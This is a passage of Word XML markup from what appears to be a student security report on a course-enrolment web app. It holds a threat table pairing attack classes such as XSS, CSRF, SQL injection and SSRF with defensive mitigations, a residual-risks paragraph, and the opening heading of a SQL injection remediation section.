            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1006A4DC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Cookie theft via XSS or sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="69EF3C9F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpOnly, Secure (prod), SameSite=Lax cookie flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="43F7BD62" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F685400" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5,7,9,12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="606B9117" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19A9FA65" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CSRF — forged cross-site request performs an action as the victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28F7C2C5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Per-session CSRF token verified with hash_equals() on every state-changing POST; token rotates after use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="34C2DB47" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="12292CD3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="50A9546C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tampering / Info. Disc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B188ECD" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Stored XSS via the bio field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="482B0099" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Output encoding (</w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>htmlspecialchars) on every dynamic value; CSP script-src 'self'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="29652633" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="326309A3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6,8,11,15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1C7579B3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61CA8671" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL injection via search / enrolment / profile fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="319482A8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Parameterised queries; input format validation as defence in depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="1419BCC4" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="28772ABA" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7EAEDDE2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="15832FC6" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Race condition over-subscribes a </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>capacity-limited course</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="64CC7E64" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SELECT ... FOR UPDATE inside a transaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5DBECD1D" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A6B5709" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9,10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42F6D813" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tampering / EoP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12CC28A5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Malicious file disguised with a safe extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D401051" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Content-sniffed MIME check (finfo), random on-disk filename, storage outside the web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="6B72B0E7" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7BCFBBA1" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>12,13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6B5E177B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tampering / EoP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="13B7BD9A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF — </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>server fetches internal/cloud-metadata addresses on attacker's behalf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0AF1706D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Host allowlist, HTTPS-only, resolved-IP re-check against private/loopback/link-local/metadata ranges, no redirect-following</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="642712FE" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29F98DAC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="65BCCDC8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="172F6ABE" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken access control — student </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>reaches admin pages directly by URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="111EC2E2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Server-side role re-check (requireAdmin()) on every admin request, independent of navigation UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="34291CA1" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A1091A2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="78AFDB40" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0D7B1991" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Resource exhaustion via large uploads or rapid requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="46909822" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5 MB upload cap; login rate limiting (full </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DDoS protection out of scope — see Section 9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5074B24D" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="283C22E2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2612FC23" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Security Misconfig.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="415FA1DB" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Debug info / verbose errors / missing headers leak internals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0CD131EB" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>display_errors fails closed; CSP, X-Content-Type-Options, X-Frame-Options, Referrer-Policy, HSTS applied globally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E91B13" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="007B5C98">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C07F58" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Residual</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> risks not fully mitigated within this assignment's scope — no WAF/network-layer DDoS protection, no multi-factor authentication, and no automated dependency scanning — are carried forward as accepted risks in the risk register (Section 6) and discussed as</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> recommendations in Section 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E22BD5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB8748E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>4. Task 2: Authentication Hardening and SQL Injection Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C2DD3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>4.1 Finding: SQL Injection in the Login Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3856C102" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
